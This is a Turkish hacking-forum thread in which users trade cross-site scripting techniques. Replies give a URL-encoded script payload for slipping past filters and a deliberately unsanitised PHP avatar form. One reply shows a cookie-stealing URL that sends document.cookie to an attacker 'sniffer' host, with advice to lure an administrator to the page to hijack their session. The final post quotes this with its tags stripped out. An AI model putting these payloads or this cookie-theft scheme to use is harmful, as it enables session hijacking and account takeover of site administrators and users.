Farklı XSS Yöntemleri

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    dejnclea
    dejnclea's avatar
    Kayıt Tarihi: 28/Haziran/2010
    Erkek

    Arkadaşlar merhaba.

     

    Ne gibi farklı XSS yöntemleri var ?

     

    Daha açıklayıcı olması bakımından şöyle anlatayım. mesela bir bildiğimiz standart js çalıştırma şeklinde. sayfa uzantısına

     

    <script>alert("xss");</script>

     

    yazarak yaptığımız xss saldırıları var. bundan başka ne gibi komutlar yazabiliriz ?

  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    amele_2
    amele_2's avatar
    Kayıt Tarihi: 01/Eylül/2005
    Erkek

    döküman arşivinde xss ile ilgili bayâ bi döküman var


    Ardından yüz köpek havlamayan kurt, kurt sayılmaz..
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    renegadealien
    renegadealien's avatar
    Üstün Hizmet Madalyası Savaş Madalyası Başarı Madalyası Üstün Hizmet Madalyası Developer Madalyası
    Kayıt Tarihi: 23/Mart/2003
    Erkek

    aletin içerisine, javascriptle, cookie post edecek kod koyup, o sayfayı admine actırabilirsen, cookieyi alabilirsin hocam...


    10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Kendi özlü sözümdür, kaynak belirterek kullanınız.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    dejnclea
    dejnclea's avatar
    Kayıt Tarihi: 28/Haziran/2010
    Erkek

    bazı sistemlerde html taglarına izin vermiyorlar % falan kullanarak bişeyler yapılıyor sanırım ama nasıl olduğunu bilmiyorum. html tagları kullanmadan yapmak mümkün mü ?

  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    anarsistherif
    anarsistherif's avatar
    Kayıt Tarihi: 27/Ağustos/2009
    Erkek

    html taglarini hex'e cevirip bu filtrelemeyi asabiliyorsunuz.
    %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%5c%27%78%73%73%5c%5c%6e%78%33%75%71%6d%34%5c%27%29%3b%3c%2f%73%63%72%69%70%74%3e

    Mesela ustteki kodda, <script>alert('xss\nx3uqm4');</script> yaziyor.

    XSS Sadece adres cubuguna yazilarak olmuyor tabii :)

    Mesela bi forum sitesi dusunelim. acemice kodlanmis. kendinize bi avatar ayarlayacaksiniz. resim urlsi istiyor, url yerine <script>alert('xss');</script> yazip bi xss acigi deneyebilirsiniz. eger xss varsa basit bi konu acip admini sayfaya cekersiniz, cookiesini alir ve hacklersiniz.

    mesela kodlar su, (postatilacaksayfa.php)
    <?php
    $resim=$_POST['resim'];
    echo '<img src=" $resim " />';
    ?>
    $resim degiskeni onceki sayfada belirtiliyor. post yontemiyle atiliyor. bu sekilde dusunelim. bu sayfada, ilk satirdaki kod ile veri cekiliyor. ikinci satirda resim gosteriliyor. 

    Post atilan sayfada su olsun;
    <form action="postatilacaksayfa.php" method="post">
    Resim adresi: <input type="text" name="resim" value"" />
    <input type="submit" name="gonder" "value="Gonder" />
    </form>
    buda post.html olsun.

    Simdi burda herhangi bir filtreleme vs bir islem yok.
    Biz post.html`de resim adresine,  
    http://www.hackerinsitesi.com/sniffer/s.php?'+document.cookie

    Yazarsak, resim yerine s.php sayfasini gosterir. s.php sayfasinadaysa cookieler calinir.
    Tek yapmamiz gereken resmi gostermek :)

    Direk sniffer yerine, kod calistirmak icin;

    post.html sayfasindaki resim adresine,
    "/>'; yazdiktan sonra istedigimiz kodu enjekte edebiliriz. ornegin,
    "/>'; echo "xss"; echo "<script>alert('xss');</script>";
    Tarzinda sayfada istedigimizi gosterebiliriz.

    Umarim yararli olmustur. kodlari acip denemedim ufak hatalar olabilir :)


    =)
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    dejnclea
    dejnclea's avatar
    Kayıt Tarihi: 28/Haziran/2010
    Erkek

    x3uqm4 bunu yazdı:
    -----------------------------
     

    html taglarini hex'e cevirip bu filtrelemeyi asabiliyorsunuz.
    %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%5c%27%78%73%73%5c%5c%6e%78%33%75%71%6d%34%5c%27%29%3b%3c%2f%73%63%72%69%70%74%3e

    Mesela ustteki kodda, // yaziyor.

    XSS Sadece adres cubuguna yazilarak olmuyor tabii :)

    Mesela bi forum sitesi dusunelim. acemice kodlanmis. kendinize bi avatar ayarlayacaksiniz. resim urlsi istiyor, url yerine // yazip bi xss acigi deneyebilirsiniz. eger xss varsa basit bi konu acip admini sayfaya cekersiniz, cookiesini alir ve hacklersiniz.

    mesela kodlar su, (postatilacaksayfa.php)

    $resim=$_POST['resim'];
    echo '';
    ?>
    $resim degiskeni onceki sayfada belirtiliyor. post yontemiyle atiliyor. bu sekilde dusunelim. bu sayfada, ilk satirdaki kod ile veri cekiliyor. ikinci satirda resim gosteriliyor. 

    Post atilan sayfada su olsun;
     

    < ="postatilacaksayfa.php" method="post"> 
    Resim adresi: < name="resim" ="text" />
    < name="gonder" ="submit" value="Gonder" />
     


    buda post.html olsun.

     

    Simdi burda herhangi bir filtreleme vs bir islem yok.
    Biz post.html`de resim adresine,  
    http://www.hackerinsitesi.com/sniffer/s.php?'+document.cookie

    Yazarsak, resim yerine s.php sayfasini gosterir. s.php sayfasinadaysa cookieler calinir.
    Tek yapmamiz gereken resmi gostermek :)

    Direk sniffer yerine, kod calistirmak icin;

    post.html sayfasindaki resim adresine,
    "/>'; yazdiktan sonra istedigimiz kodu enjekte edebiliriz. ornegin,
    "/>'; echo "xss"; echo " // ";
    Tarzinda sayfada istedigimizi gosterebiliriz.

    Umarim yararli olmustur. kodlari acip denemedim ufak hatalar olabilir :)


    -----------------------------

     

     

     

    Teşekkürler =). Bir de böyle deneyeyim=)

Toplam Hit: 1262 Toplam Mesaj: 6